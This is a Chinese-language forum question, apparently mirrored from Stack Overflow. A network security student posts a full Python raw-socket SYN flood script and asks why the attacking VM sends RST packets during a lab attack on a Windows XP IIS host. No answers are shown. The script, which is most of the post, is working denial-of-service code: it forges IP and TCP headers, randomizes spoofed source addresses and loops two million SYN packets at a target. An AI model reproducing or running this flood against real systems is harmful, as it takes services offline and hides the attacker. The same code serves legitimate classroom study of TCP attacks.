Python套接字在synflood期间发送意外的RST数据包
我正在通过Socket编程在网络安全课程中编写synflood攻击代码。我将使用伪装的源ip地址使用SYN标志向受害者发送大量TCP数据包,但我遇到了错误。
我的SYN_flood.py文件:
#!/bin/env python
# -*- coding: UTF-8 -*-
# Require running as root
import socket
import sys
import time
import random
from struct import *
# Ip packet checksum calculation
def checksum(msg):
s = 0
# Get 2 bytes each time
for i in range(0,len(msg),2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]))
s = s+w
s = (s>>16) + (s & 0xffff)
s = ~s & 0xffff
return s
# Create Socket
def CreateSocket(source_ip,dest_ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
#Provide ip header manually
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
except socket.error, msg:
print 'Socket create error: ',str(msg[0]),'message: ',msg[1]
sys.exit()
return s
# Make ip header manually
def CreateIpHeader(source_ip, dest_ip):
packet = ''
headerlen = 5
version = 4
tos = 0
tot_len = 20 + 20
id = random.randrange(0,65535,1)# A random id
frag_off = 0
ttl = 128
protocol = socket.IPPROTO_TCP
check = 10
saddr = socket.inet_aton ( source_ip )
daddr = socket.inet_aton ( dest_ip )
hl_version = (version << 4) + headerlen
ip_header = pack('!BBHHHBBH4s4s', hl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
return ip_header
#Make tcp header
def create_tcp_syn_header(source_ip, dest_ip, dest_port):
source = random.randint(32000,62000) # Random source port
seq = 0
ack_seq = 0
doff = 5
# tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = 65535
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn<<1) + (rst<<2) + (psh<<3) + (ack<<4) + (urg<<5)
tcp_header = pack('!HHLLBBHHH', source, dest_port, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# Pseudo header
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton( dest_ip )
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length);
psh = psh + tcp_header;
tcp_checksum = checksum(psh)
# Repack tcp header with right checksum
tcp_header = pack('!HHLLBBHHH', source, dest_port, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)
return tcp_header
# Randomize source ip
def randip():
x = random.randrange(10,200,1)
y = random.randrange(10,200,1)
z = random.randrange(10,200,1)
w = (x+y+z)%254
ip = str(x)+"."+str(y)+"."+str(z)+"."+str(w)
return ip
# Pack the ip packet
def makepkt(fakesource, dest_ip, dest_port):
source_ip = randip()
ip_header = CreateIpHeader(fakesource, dest_ip)
tcp_header = create_tcp_syn_header(fakesource, dest_ip,dest_port)
packet = ip_header + tcp_header
print 'packetfrom',source_ip,'to',dest_ip,':',dest_port
return packet
# Send packets through Socket
def attack(dest_ip, dest_port):
source_ip = '192.168.80.145'
s = CreateSocket(source_ip, dest_ip)
for i in range(1,2000000):
fakesource = randip()
packet = makepkt(fakesource,dest_ip,dest_port)
s.sendto(packet, (dest_ip, dest_port))
# Main operation:
ipdest = '192.168.80.133'
portdest = 80
attack(ipdest, portdest)
受害者是在端口80上运行IIS Web服务的Windows XP SP3 VM,ip是192.168.80.133;攻击者是kali3-amd64 VM,ip是192.168.80.145。在两个VM上都禁用了防火墙,并且没有安全软件。
Wireshark显示攻击者发送了许多SYN数据包,并且受害者用SYN + ACK数据包应答了一些SYN数据包。这是TCP连接的第二次握手,但是攻击者似乎正在主动发送RST数据包以关闭所有这些连接。
在这种情况下,攻击者不应该发送RST数据包。我的python脚本有问题吗?还是我的环境配置有问题?
0 个答案:
没有答案
相关问题
最新问题
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?